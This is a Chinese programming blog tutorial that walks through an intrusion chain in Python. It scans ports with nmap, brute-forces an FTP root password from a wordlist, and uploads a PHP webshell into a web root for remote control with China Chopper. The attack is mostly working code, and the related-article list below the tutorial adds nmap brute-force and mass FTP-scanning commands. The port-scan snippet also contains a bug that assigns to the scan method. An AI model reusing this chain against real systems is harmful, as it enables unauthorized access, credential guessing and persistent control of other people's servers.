python——利用nmap进行端口扫描,爆破ftp密码,上传wellshell.

最新推荐文章于 2022-05-21 08:11:14 发布
最新推荐文章于 2022-05-21 08:11:14 发布
阅读量3.5k 收藏 14
点赞数 2
CC 4.0 BY-SA版权
分类专栏: python学习 文章标签: python 黑客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40909772/article/details/84201801
本文介绍如何使用Python和nmap进行端口扫描,爆破FTP密码并上传webshell,涵盖网络渗透测试的基本步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、端口扫描

首先安装nmap与python-nmap模块。从http://nmap.org/download.html网站下载nmap安装文件。从http://xael.org/norman/python/python-nmap网站下载python-nmap模块安装文件。

1.代码。

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys
import os
import nmap
import socket

nm = nmap.PortScanner()

nm.scan = ('192.168.139.128', '1-1024')

for host in nm.all_hosts():
    print('-------------------------')
    print('host : {0} ({1})'.format(host, nm[host].hostname()))
    print('State : {0}'.format(nm[host].state()))
    
    for proto in nm[host].all_protocols():
        print('--------------')
        print('Protocol : {0}'.format(proto))

        lport = list(nm[host][proto].keys())
        lport.sort()
        for port in lport:
            print('port : {0}\tstate : {1}'.format(port, nm[host][proto][port]))
    print('----------------------------')

端口扫描原理是黑客pc向服务器pc发送多种协议的数据包,观察服务器pc的响应行为。若服务器pc给黑客pc返回某类数据包则证明服务器pc开放支持这种协议的端口!出了用python代码调用nmap扫描端口外,你可以直接在命令行使用nmap,这样更方便快捷!
nmap命令及参数
nmap:

		-sS  半开扫描TCP和SYN扫描

		-sT  完全TCP链接扫描

		-sU  UDP扫描

		-PS  sym包探测(防火墙探测)

		-PA  ack包探测 (防火墙探测)

		-PN  不ping

		-n  不dns解析

		-A -O和-sV

		-O  操作系统识别

		-sV  服务器版本信息(banner)

		-P  端口扫描

		-T  设置时间级别(0-5)

		-iL  导入扫描将结果

		-oG  输出扫描结果

2.测试。

使用Windows对Linux主机进行端口扫描。
在这里插入图片描述
查看服务器操作系统。
在这里插入图片描述

二、爆破ftp密码。

通过端口扫描我们看出此服务器开放21端口用来支持ftp协议(文件传输协议),ftp服务后台设置中通常不会检查密码输错次数,所以我们可以使用python提供的ftplib模块,爆破ftp密码。假设用户名已知,实际大多数用户都会使用默认的root用户名!

1.代码。

#!/usr/bin/python
# -*- coding: UTF-8 -*-
from ftplib import FTP

word = open('C:\Users\lenovo\Desktop\w.txt','r')
user_login = "root"

def getPassword(password):
    try:
        ftp = FTP("192.168.204.129")
        ftp.login(user_login,password)
        print("user password:",password)
        return True
    except Exception:
        return False
    
passwords = word.readlines()
for password in passwords:
    password = password.strip()
    print("test password:",password)
    if(getPassword(password)): 
        break
word.close()

首先需要创建一个w.txt字典文件,打开w.txt文件,声明getPassword()函数,用于连接FTP服务器,并尝试登录,使用root用户名和字典密码登录。若正常登录,则执行下一条语句,否则触发异常!再使用for循环遍历字典,调用getPassword()函数,若正常登录则返回True,结束循环!

2.测试。

爆破Linux ftp服务密码。
在这里插入图片描述

三、上传webshell。

使用爆破出来的密码登录ftp服务器,上传webshell。功能强大的webshell可以实现远程控制主机。

1.代码。

#!/usr/bin/python
# -*- coding: UTF-8 -*-
from ftplib import FTP

apacheDir = "html"
serverName = '192.168.204.129'
serverID = 'root'
serverPW = 'toor'

ftp = FTP(serverName,serverID,serverPW)

ftp.cwd("/var/www/html/")

fp = open("C:\Users\lenovo\Desktop\webshell.php","rb")
ftp.storbinary("STOR webshell.php",fp)

fp.close()
ftp.quit()

首先登录ftp服务器,再转到web安装目录,然后打开webshell文件,最后使用ftp.storbinary(“STOR webshell.php”,fp)上传webshell文件到web安装目录!

2.测试。

运行代码上传文件
在这里插入图片描述
在服务器端进入web安装目录,可以看到webshell文件成功上传,然后使用中国菜刀连接。
在这里插入图片描述

通过fofa与nmap联动寻找FTP协议漏洞方案
m0_52027565的博客
11-17 901
通过fofa与nmap联动寻找FTP协议漏洞方案 你好哇!我是面包and牛奶——一个堪堪入门的"安全菜鸟",最近通过研究Google语法和伪协议;对FTP协议漏洞具有了一定程度的了解。所以写下这篇博客作为学习记录,并且分享给阅读这篇文章的有缘人! 学习过程谷歌语法 || FTP协议一、使用fofa查找开放21端口的目标二、使用namp爆破1.设置脚本2.攻击总结 谷歌语法 || FTP协议 Google语法产生原因:Google是一个功能强大的搜索引擎,通过预定义命令,可以查询出令...
nmap】基于python实现nmap端口扫描
微雨停了的博客
04-23 1460
【代码】【nmap】基于python实现nmap端口扫描
基于nmap扫描结果的端口爆破工具:BrutesPray
weixin_33729196的博客
06-26 886
大家搞内网或者C段渗透测试的时候可能遇到很多时候需要对大批的主机进行精确爆破,这时候BruteSpray就派上用场了。 BruteSpray是一款基于nmap扫描输出的gnmap/XML文件.自动调用Medusa对服务进行爆破(Medusa美杜莎 是一款端口爆破工具,速度比Hydra九头蛇快)。 BruteSpray甚至可以通过Nmap –sV参数的扫描找到非标准端口...
nmap常用爆破命令
qq_45750691的博客
03-18 1224
nmap常用爆破命令 nmap -p 445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128 nmap -p 21 -sT –script ftp-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128 nmap -p 23 –script telnet-brute.nse –scrip.
Python 渗透测试:文件传输爆破( 21端口
网络安全领域___专研者.
05-21 3216
Python 开发学习的意义: (1)学习相关安全工具原理. (2)掌握自定义工具及拓展开发解决实战中无工具或手工麻烦批量化等情况. (3)在二次开发 Bypass,日常任务,批量测试利用等方面均有帮助.
Nmap渗透测试指南》—第9章9.2节审计FTP服务器
weixin_34204722的博客
05-02 402
本节书摘来自异步社区《Nmap渗透测试指南》一书中的第9章9.2节审计FTP服务器,作者 商广明,更多章节内容可以访问云栖社区“异步社区”公众号查看。 9.2 审计FTP服务器表9.3所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计FTP服务器。 操作步骤使用命令“nmap --script ftp-brute -p 21...
python3-nmap:一个有助于使用nmap端口扫描程序的python 3库。 这是通过将每个nmap命令转换为可调用的python3方法或函数来完成的。 系统管理员现在可以使用python自动进行nmap扫描
04-24
一个有助于使用nmap端口扫描程序的python 3库。 该工具的工作方式是将每个nmap命令定义为一个python函数,从而可以非常轻松地在其他python脚本中使用复杂的nmap命令。 Nmap是用于在目标网络上进行侦察的复杂软件,...
python nmap实现端口扫描器教程
09-18
PythonNmap结合实现端口扫描器的教程详细地介绍了如何利用Python的第三方库python-nmap来编写端口扫描程序。Nmap是一款功能强大的网络扫描工具,最初是作为Linux下的一个网络扫描和嗅探工具而被开发出来。在网络...
Python安全审计:Nmap端口扫描集成.pdf
最新发布
04-19
Python 就是你的不二之选!它作为当今最热门的编程语言,以简洁优雅的语法和强大的功能,深受全球开发者喜爱。该文档为你开启一段精彩的 Python 学习之旅。从基础语法的细致讲解,到实用项目的实战演练,逐步提升你...
mysql nmap_Nmap的简单爆破
weixin_32233079的博客
02-17 381
首先我们来对目标系统进行一次简单的扫描,。以确定其开放的服务有哪些:nmap 192.168.30.128可以看到,目标服务器开放了众多的服务端口!下面我们来对其SMB 服务进行一个简单爆破:**nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt192.168.30.128**可以看到用...
ftp密码加强爆破工具
04-06
ftp密码加强爆破工具
ftp探测 扫描FTP弱口令
02-10
---------------------------------------------------根据百度搜索获取网站地址 然后扫描FTP弱口令! ftp_pass.txt 里可以自己修改字典! 本程序为技术交流使用 不可用于非法用途---------------------------------------------------
masscan+nmap批量获取FTP-anno
a439017985的博客
02-11 2520
1.masscan -p 21 60.8.151.0/16  --rate=10000  输出扫描结果,下面交给nmap 2.nmap -vvv  --script ftp-anon  -p 21 -D RND:100 -vvv  -Pn -iL 21.txt  -n -w -T4 http://www.freebuf.com/sectool/112583.html   masscan
nmap mysql爆破_关于Nmap的简单爆破
weixin_42316909的博客
02-06 2075
首先我们来对目标系统进行一次简单的扫描,。以确定其开放的服务有哪些:nmap 192.168.30.128可以看到,目标服务器开放了众多的服务端口!下面我们来对其 SMB 服务进行一个简单爆破nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128可以看到用户名...
扫描与爆破(nmap与hydra)
Web安全工具库
07-25 1464
如果有一天,你突然想起我对你的好,我希望你别哭,也别遗憾,因为,我不在。。。。 ---- 网易云热评 一、常见端口FTP服务:21 SSH服务:22 Telnet服务:23 SMTP服务:25 HTTP服务:80 HTTPS服务:443 SQLServer数据库:1433 Oracle数据库:1521 MYSQL数据库:3306 RDP服务:3389 二、Nmap-扫描器之王 1、扫描192.168.1.1-192.168.1.255存活的主机 nmap -sP ...
常见端口利用nmap的常见使用参数
qq_44768719的博客
11-08 1103
nmap -T[0-5] 时间参数模板 -T0:非常慢,用于IDS逃避 -T1:比较慢,用于IDS逃避 -T2:降低速度以降低对带宽的消耗,一般不同 -T3:默认,根据目标的反应自动调整时间 -T4:快速扫描,常用,需要在很好的网络环境下进行扫描,请求可能会淹没目标 -T5:极速扫描,牺牲准确度 -sS 半开放扫描。Nmap发送SYN包到远程主机,它不会产生任何会话.不需要通过完整的握手,就能获得远程主机的信息。因此不会在目标主机上产生任何日志记录 -sT TCP connect扫描,需要完成三次...
nmap学习笔记(三)-----端口扫描技术
wkend的博客
03-25 988
端口扫描技术 绝大多数时候,一个功能强大的工具可以提高我们的工作效率,节省很多时间和精力,当然前提是我们要熟悉我们手中的工具。这样才能将工具充分利用起来,就如古语所说:千里马常有,而伯乐不常有。 虽然Nmap努力产生正确的结果,但请记住所有结果都是基于目标机器(或者它们前面的防火墙)返回的报文的。 。这些主机也许是不值得信任的,它们可能响应以迷惑或误导Nmap的报文。 更普遍的是非RFC兼...
python 调用nmap_Python-通过调用Nmap来进行端口扫描
weixin_29185493的博客
02-03 241
首先要安装python-nmap库,还要安装配置好nmap实验机器IP:192.168.220.139端口开放情况代码# -*- coding:utf-8 -*-__author__ = "MuT6 Sch01aR"import nmapdef NmapScan(ip,port):Nmapscan = nmap.PortScanner(nmap_search_path=(‘nmap‘,r‘C:\P...
Python之渗透测试笔记(二)——python-nmap模块
weixin_44889655的博客
04-06 1088
python-nmap 模块 简介 nmap以下功能: 主机发现功能 端口扫描 服务器版本检测 操作系统检测 此外还有一些高级审计技术(伪造扫描段身份、绕过防火墙等)、脚本引擎NSE等。 安装python-nmap,须先安装nmap。 Windows直接下载安装 Linux需要如下命令: sudo apt-get install nmap sudo pip install pytho...
利用Nmap进行端口扫描
01-03
### 如何使用Nmap执行端口扫描 #### 基本命令结构 为了启动基本的端口扫描,可以利用`nmap`工具并指定目标IP地址或域名。最简单的形式如下所示: ```bash nmap <target> ``` 这里的 `<target>` 可以是一个具体的 IP 地址或是主机名[^1]。 #### 执行全面扫描 对于更详细的分析,可以通过 `-A 192.168.1.77 ``` 这条指令不仅会进行标准的TCP连接扫描,还会尝试推断远端设备的操作系统类型及其上运行的服务版本信息[^2]。 #### 启用OS检测 如果仅需知道对方可能使用的平台而不需要其他额外细节,则可以直接通过 `-O` 开关开启操作系统的推测机制: ```bash nmap -O host ``` 这会让程序基于已知模式库去匹配响应特征从而给出最佳猜测结果[^3]。 #### Traceroute 功能集成 当想要追踪到达特定目的地之间的路径时,可借助 `--traceroute` 参数让 Nmap 并行地向多个节点发送探测报文,并记录下沿途经过的关键路由器信息: ```bash nmap --traceroute target_ip_or_hostname ``` 该特性有助于绘制出完整的网络拓扑图以及评估链路质量状况[^4]。 #### 查看具体协议交互详情 假设已经完成了一次UDP类型的端口普查并将捕获的数据保存到了文件当中;那么现在就可以运用像tcpdump这样的抓包软件配合过滤条件重新解析这些历史流量样本,以便深入理解通信过程中的行为特点: ```bash sudo tcpdump -nn -P out -r ~/scan_results/udp_scan/packets 'udp and port 53' ``` 上述例子展示了怎样读取之前存储于本地磁盘上的二进制日志资料,并聚焦于DNS查询请求部分的内容展示[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晶晶娃在战斗

你的鼓励将是我创作的最大动力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值